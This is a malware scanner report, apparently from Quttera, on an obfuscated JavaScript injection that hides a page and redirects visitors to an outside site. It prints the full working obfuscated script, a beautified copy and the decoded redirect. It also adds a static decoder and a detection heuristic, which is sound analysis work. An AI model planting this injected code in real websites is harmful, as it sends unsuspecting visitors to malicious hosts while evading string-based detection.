Obfuscated malicious JavaScript code redirects to remote malicious resource
Background
Online Website Malware Scanner has identified a malicious JavaScript code injection in the scanned website. The obfuscated JavaScript builds the target URL at page-rendering time, so the URL never appears in clear text in the file. When such a web page is accessed, the visitor's browser downloads content from a remote malware distributor. This infected website hosts suspicious JavaScript code injected into 2 files.
Malicious action
Real-time URL generation is often used to fetch malware hosted on external web resources (websites), and it also defeats simple signature or string matching on the stored file, since the destination exists only after the code has run.
Website malware scanner report
Submission date: Fri Apr 19 01:31:38 2013
Infected website's files: 2
Website malware scanner sitescan report by Quttera
Malicious JavaScript
Threat dump:
<script type='text/javascript' language='javascript' >
// <![CDATA[
var OEtkdtANvKk = String.fromCharCode( 0x68, 116, 0164, 0x70, 072, 057, 47, 98, 101, 0163, 0164, 0x61, 0x6e, 0x64, 101, 0141, 0x73, 0151, 101, 115, 0164, 0x77, 0x61, 0x79, 0163, 116, 111, 0154, 0157, 0163, 0x65, 0167, 101, 105, 0x67, 104, 116, 0x2e, 99, 111, 109, 057, 0x69, 0156, 0x64, 101, 120, 0x65, 0x72, 0x2e, 112, 0150, 0x70, 63, 97, 075, 062, 50, 54, 0x38, 0x34, 53, 38, 0x63, 0x3d, 0167, 108, 0x5f, 0x63, 0x6f, 0156 );
var msKKpuoJVPjXfi = unescape("%69%66%20%28%77%69%6e" + "%64" + "%6f" + "%77%2e%6c%6f%63%61%74%69%6f" + "%6e%2e%68%61%73%68%20%3d%3d%20%22%23%77%79%76%6b%22%29%20%7b" + "%20%64%6f" + "%63%75%6d%65" + "%6e%74%2e%62%6f%64%79%2e%73" + "%74%79%6c%65%2e%64%69" + "%73%70%6c%61" + "%79" + "%3d%22%6e%6f%6e%65%22%3b" + "%20%77" + "%69%6e%64%6f%77%2e%6c%6f%63%61%74%69%6f" + "%6e%2e%68%72%65%66%20%3d%20\'")+OEtkdtANvKk+String.fromCharCode( 0x27, 59, 0x20, 0x7d );
eval(msKKpuoJVPjXfi);
// ]]>
</script>
Malware entry
Malware entry details.
Beautified script
var OEtkdtANvKk = String.fromCharCode(0x68, 116, 0164, 0x70, 072, 057, 47, 98, 101, 0163, 0164, 0x61, 0x6e, 0x64, 101, 0141, 0x73, 0151, 101, 115, 0164, 0x77, 0x61, 0x79, 0163, 116, 111, 0154, 0157, 0163, 0x65, 0167, 101, 105, 0x67, 104, 116, 0x2e, 99, 111, 109, 057, 0x69, 0156, 0x64, 101, 120, 0x65, 0x72, 0x2e, 112, 0150, 0x70, 63, 97, 075, 062, 50, 54, 0x38, 0x34, 53, 38, 0x63, 0x3d, 0167, 108, 0x5f, 0x63, 0x6f, 0156);
var msKKpuoJVPjXfi = unescape("%69%66%20%28%77%69%6e" + "%64" + "%6f" + "%77%2e%6c%6f%63%61%74%69%6f" + "%6e%2e%68%61%73%68%20%3d%3d%20%22%23%77%79%76%6b%22%29%20%7b" + "%20%64%6f" + "%63%75%6d%65" + "%6e%74%2e%62%6f%64%79%2e%73" + "%74%79%6c%65%2e%64%69" + "%73%70%6c%61" + "%79" + "%3d%22%6e%6f%6e%65%22%3b" + "%20%77" + "%69%6e%64%6f%77%2e%6c%6f%63%61%74%69%6f" + "%6e%2e%68%72%65%66%20%3d%20\'") + OEtkdtANvKk + String.fromCharCode(0x27, 59, 0x20, 0x7d);
eval(msKKpuoJVPjXfi);
Malicious payload
The decoded payload redirects the visitor to a malicious web resource. Note the condition: it only fires when the page is opened with the URL fragment #wyvk, and it hides the page body before redirecting, so a site owner browsing normally will not see it trigger.
if (window.location.hash == "#wyvk") {
    document.body.style.display = "none";
    window.location.href = 'http://bestandeasiestwaystoloseweight.com/indexer.php?a=226845&c=wl_con';
}
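The two layers above (a String.fromCharCode list mixing hex, legacy octal and decimal literals, and a percent-encoded unescape string) can be peeled statically, without ever calling eval(). The following is an added example, not Quttera's code or tooling; it decodes the sample from this page, and the helper names and the triage rule are my own.

```javascript
// Added example (not Quttera's code): peel both obfuscation layers of the
// threat dump above statically, with no eval(), the way an analyst would.
// SAMPLE is the script from this page; helper names are my own.
const SAMPLE = `var OEtkdtANvKk = String.fromCharCode( 0x68, 116, 0164, 0x70, 072, 057, 47, 98, 101, 0163, 0164, 0x61, 0x6e, 0x64, 101, 0141, 0x73, 0151, 101, 115, 0164, 0x77, 0x61, 0x79, 0163, 116, 111, 0154, 0157, 0163, 0x65, 0167, 101, 105, 0x67, 104, 116, 0x2e, 99, 111, 109, 057, 0x69, 0156, 0x64, 101, 120, 0x65, 0x72, 0x2e, 112, 0150, 0x70, 63, 97, 075, 062, 50, 54, 0x38, 0x34, 53, 38, 0x63, 0x3d, 0167, 108, 0x5f, 0x63, 0x6f, 0156 );
var msKKpuoJVPjXfi = unescape("%69%66%20%28%77%69%6e" + "%64" + "%6f" + "%77%2e%6c%6f%63%61%74%69%6f" + "%6e%2e%68%61%73%68%20%3d%3d%20%22%23%77%79%76%6b%22%29%20%7b" + "%20%64%6f" + "%63%75%6d%65" + "%6e%74%2e%62%6f%64%79%2e%73" + "%74%79%6c%65%2e%64%69" + "%73%70%6c%61" + "%79" + "%3d%22%6e%6f%6e%65%22%3b" + "%20%77" + "%69%6e%64%6f%77%2e%6c%6f%63%61%74%69%6f" + "%6e%2e%68%72%65%66%20%3d%20\'")+OEtkdtANvKk+String.fromCharCode( 0x27, 59, 0x20, 0x7d );
eval(msKKpuoJVPjXfi);`;

// The dump mixes three literal forms on purpose: 0x.. hex, 0.. legacy octal, plain decimal.
function parseJsNumber(tok) {
  tok = tok.trim();
  if (/^0[xX][0-9a-f]+$/i.test(tok)) return parseInt(tok.slice(2), 16);
  if (/^0[0-7]+$/.test(tok)) return parseInt(tok.slice(1), 8);
  if (/^[1-9]\d*$|^0$/.test(tok)) return parseInt(tok, 10);
  throw new Error("unsupported numeric literal: " + tok);
}

// Every String.fromCharCode(...) call whose arguments are all literals, decoded in source order.
function decodeFromCharCode(src) {
  const out = [];
  for (const m of src.matchAll(/String\.fromCharCode\s*\(([^)]*)\)/g)) {
    out.push(String.fromCharCode(...m[1].split(",").map(parseJsNumber)));
  }
  return out;
}

// unescape("%69%66" + "%20" + ...): join the quoted pieces, then percent-decode them.
function decodeUnescape(src) {
  const out = [];
  for (const m of src.matchAll(/unescape\s*\(((?:\s*"[^"]*"\s*\+?)+)\)/g)) {
    const joined = [...m[1].matchAll(/"([^"]*)"/g)].map(p => p[1]).join("");
    out.push(joined.replace(/%([0-9a-f]{2})/gi, (_, h) => String.fromCharCode(parseInt(h, 16))));
  }
  return out;
}

// Reassemble what eval() would have run; this order (prefix + URL + "'; }") is specific to this sample.
function decodeRedirectScript(src) {
  const literals = decodeFromCharCode(src);
  const url = literals.find(s => /^https?:\/\//i.test(s)) || null;
  const payload = decodeUnescape(src)[0] + url + literals[literals.length - 1];
  return { url, payload };
}

// Cheap triage rule for a file scanner: eval() in a file that also builds strings via unescape()/fromCharCode.
function looksLikeEvalObfuscation(src) {
  return /\beval\s*\(/.test(src) && /\bunescape\s*\(|String\.fromCharCode/.test(src);
}

console.log(decodeRedirectScript(SAMPLE));
```

The recovered payload matches the beautified version above except for whitespace, which the beautifier normalised.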
Malware clean-up
Such malware is often hidden inside a legitimate JavaScript file on the site. If you suspect that your website was infected by similar malware, please use Website Anti-malware Monitoring for remediation assessment.